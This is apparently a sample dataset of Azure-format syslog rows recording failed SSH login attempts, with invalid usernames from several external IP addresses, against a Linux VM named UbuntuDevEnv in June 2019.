+15826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:02:41,UbuntuDevEnv,2019-06-26 06:02:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:02:41,UbuntuDevEnv,2019-06-26 06:02:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:02:44,UbuntuDevEnv,2019-06-26 06:02:43,auth,UbuntuDevEnv,info,Failed password for invalid user cu from 106.12.27.140 port 35246 ssh2,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cu,106.12.27.1,35246,,
+15829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:02:44,UbuntuDevEnv,2019-06-26 06:02:44,auth,UbuntuDevEnv,info,Disconnected from invalid user cu 106.12.27.140 port 35246 [preauth],18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cu,106.12.27.1,35246,,
+15830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:02:44,UbuntuDevEnv,2019-06-26 06:02:44,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 35246:11: Bye Bye [preauth],18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,35246,,
+15831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:06,UbuntuDevEnv,2019-06-26 06:16:05,auth,UbuntuDevEnv,info,Invalid user teste1 from 106.12.27.140 port 28918,25756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste1,106.12.27.1,28918,,
+15832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:06,UbuntuDevEnv,2019-06-26 06:16:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,25756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:06,UbuntuDevEnv,2019-06-26 06:16:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,25756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:09,UbuntuDevEnv,2019-06-26 06:16:08,auth,UbuntuDevEnv,info,Failed password for invalid user teste1 from 106.12.27.140 port 28918 ssh2,25756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste1,106.12.27.1,28918,,
+15835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:09,UbuntuDevEnv,2019-06-26 06:16:09,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 28918:11: Bye Bye [preauth],25756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,28918,,
+15836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:09,UbuntuDevEnv,2019-06-26 06:16:09,auth,UbuntuDevEnv,info,Disconnected from invalid user teste1 106.12.27.140 port 28918 [preauth],25756,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste1,106.12.27.1,28918,,
+15837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:29,UbuntuDevEnv,2019-06-26 06:16:28,auth,UbuntuDevEnv,info,Invalid user francesco from 139.99.98.248 port 60358,26072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,139.99.98.2,60358,,
+15838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:30,UbuntuDevEnv,2019-06-26 06:16:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,26072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:30,UbuntuDevEnv,2019-06-26 06:16:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:31,UbuntuDevEnv,2019-06-26 06:16:31,auth,UbuntuDevEnv,info,Failed password for invalid user francesco from 139.99.98.248 port 60358 ssh2,26072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,139.99.98.2,60358,,
+15841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:31,UbuntuDevEnv,2019-06-26 06:16:31,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 60358:11: Bye Bye [preauth],26072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,60358,,
+15842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:31,UbuntuDevEnv,2019-06-26 06:16:31,auth,UbuntuDevEnv,info,Disconnected from invalid user francesco 139.99.98.248 port 60358 [preauth],26072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,139.99.98.2,60358,,
+15843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:39,UbuntuDevEnv,2019-06-26 06:16:38,auth,UbuntuDevEnv,info,Invalid user vyatta from 45.59.69.138 port 38226,26726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,45.59.69.1,38226,,
+15844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:39,UbuntuDevEnv,2019-06-26 06:16:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:39,UbuntuDevEnv,2019-06-26 06:16:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,26726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:41,UbuntuDevEnv,2019-06-26 06:16:40,auth,UbuntuDevEnv,info,Failed password for invalid user vyatta from 45.59.69.138 port 38226 ssh2,26726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,45.59.69.1,38226,,
+15847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:41,UbuntuDevEnv,2019-06-26 06:16:41,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 38226:11: Bye Bye [preauth],26726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,38226,,
+15848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:16:41,UbuntuDevEnv,2019-06-26 06:16:41,auth,UbuntuDevEnv,info,Disconnected from invalid user vyatta 45.59.69.138 port 38226 [preauth],26726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,45.59.69.1,38226,,
+15849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:17:07,UbuntuDevEnv,2019-06-26 06:17:06,auth,UbuntuDevEnv,info,Invalid user direktor from 106.12.27.140 port 36896,26880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,direktor,106.12.27.1,36896,,
+15850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:17:07,UbuntuDevEnv,2019-06-26 06:17:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:17:07,UbuntuDevEnv,2019-06-26 06:17:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,26880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:17:09,UbuntuDevEnv,2019-06-26 06:17:09,auth,UbuntuDevEnv,info,Failed password for invalid user direktor from 106.12.27.140 port 36896 ssh2,26880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,direktor,106.12.27.1,36896,,
+15853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:17:09,UbuntuDevEnv,2019-06-26 06:17:09,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 36896:11: Bye Bye [preauth],26880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,36896,,
+15854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:17:09,UbuntuDevEnv,2019-06-26 06:17:09,auth,UbuntuDevEnv,info,Disconnected from invalid user direktor 106.12.27.140 port 36896 [preauth],26880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,direktor,106.12.27.1,36896,,
+15855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:16,UbuntuDevEnv,2019-06-26 06:23:15,auth,UbuntuDevEnv,info,Invalid user ts3 from 139.99.98.248 port 44246,28576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,139.99.98.2,44246,,
+15856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:16,UbuntuDevEnv,2019-06-26 06:23:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:16,UbuntuDevEnv,2019-06-26 06:23:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,28576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:18,UbuntuDevEnv,2019-06-26 06:23:18,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 139.99.98.248 port 44246 ssh2,28576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,139.99.98.2,44246,,
+15859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:19,UbuntuDevEnv,2019-06-26 06:23:18,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 139.99.98.248 port 44246 [preauth],28576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,139.99.98.2,44246,,
+15860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:19,UbuntuDevEnv,2019-06-26 06:23:18,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 44246:11: Bye Bye [preauth],28576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,44246,,
+15861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:38,UbuntuDevEnv,2019-06-26 06:23:38,auth,UbuntuDevEnv,info,Invalid user tom from 106.12.27.140 port 29751,28656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,106.12.27.1,29751,,
+15862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:38,UbuntuDevEnv,2019-06-26 06:23:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:38,UbuntuDevEnv,2019-06-26 06:23:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,28656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:41,UbuntuDevEnv,2019-06-26 06:23:40,auth,UbuntuDevEnv,info,Failed password for invalid user tom from 106.12.27.140 port 29751 ssh2,28656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,106.12.27.1,29751,,
+15865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:41,UbuntuDevEnv,2019-06-26 06:23:41,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 29751:11: Bye Bye [preauth],28656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,29751,,
+15866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:23:41,UbuntuDevEnv,2019-06-26 06:23:41,auth,UbuntuDevEnv,info,Disconnected from invalid user tom 106.12.27.140 port 29751 [preauth],28656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,106.12.27.1,29751,,
+15867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:20,UbuntuDevEnv,2019-06-26 06:24:20,auth,UbuntuDevEnv,info,Invalid user georges from 45.59.69.138 port 41366,28811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,georges,45.59.69.1,41366,,
+15868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:20,UbuntuDevEnv,2019-06-26 06:24:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:20,UbuntuDevEnv,2019-06-26 06:24:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,28811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:23,UbuntuDevEnv,2019-06-26 06:24:22,auth,UbuntuDevEnv,info,Failed password for invalid user georges from 45.59.69.138 port 41366 ssh2,28811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,georges,45.59.69.1,41366,,
+15871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:23,UbuntuDevEnv,2019-06-26 06:24:22,auth,UbuntuDevEnv,info,Disconnected from invalid user georges 45.59.69.138 port 41366 [preauth],28811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,georges,45.59.69.1,41366,,
+15872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:23,UbuntuDevEnv,2019-06-26 06:24:22,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 41366:11: Bye Bye [preauth],28811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,41366,,
+15873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:50,UbuntuDevEnv,2019-06-26 06:24:50,auth,UbuntuDevEnv,info,Invalid user willy from 106.12.27.140 port 37727,28901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,willy,106.12.27.1,37727,,
+15874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:50,UbuntuDevEnv,2019-06-26 06:24:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,28901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:50,UbuntuDevEnv,2019-06-26 06:24:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:53,UbuntuDevEnv,2019-06-26 06:24:52,auth,UbuntuDevEnv,info,Failed password for invalid user willy from 106.12.27.140 port 37727 ssh2,28901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,willy,106.12.27.1,37727,,
+15877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:54,UbuntuDevEnv,2019-06-26 06:24:54,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 37727:11: Bye Bye [preauth],28901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,37727,,
+15878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:24:54,UbuntuDevEnv,2019-06-26 06:24:54,auth,UbuntuDevEnv,info,Disconnected from invalid user willy 106.12.27.140 port 37727 [preauth],28901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,willy,106.12.27.1,37727,,
+15879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:02,UbuntuDevEnv,2019-06-26 06:25:01,auth,UbuntuDevEnv,info,Invalid user it from 139.99.98.248 port 33158,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,139.99.98.2,33158,,
+15880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:02,UbuntuDevEnv,2019-06-26 06:25:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:02,UbuntuDevEnv,2019-06-26 06:25:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:04,UbuntuDevEnv,2019-06-26 06:25:04,auth,UbuntuDevEnv,info,Failed password for invalid user it from 139.99.98.248 port 33158 ssh2,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,139.99.98.2,33158,,
+15883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:04,UbuntuDevEnv,2019-06-26 06:25:04,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 33158:11: Bye Bye [preauth],28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,33158,,
+15884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:25:04,UbuntuDevEnv,2019-06-26 06:25:04,auth,UbuntuDevEnv,info,Disconnected from invalid user it 139.99.98.248 port 33158 [preauth],28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,139.99.98.2,33158,,
+15885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:33:14,UbuntuDevEnv,2019-06-26 06:33:14,auth,UbuntuDevEnv,info,Invalid user ourhomes from 45.55.190.46 port 50500,30960,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ourhomes,45.55.190.4,50500,,
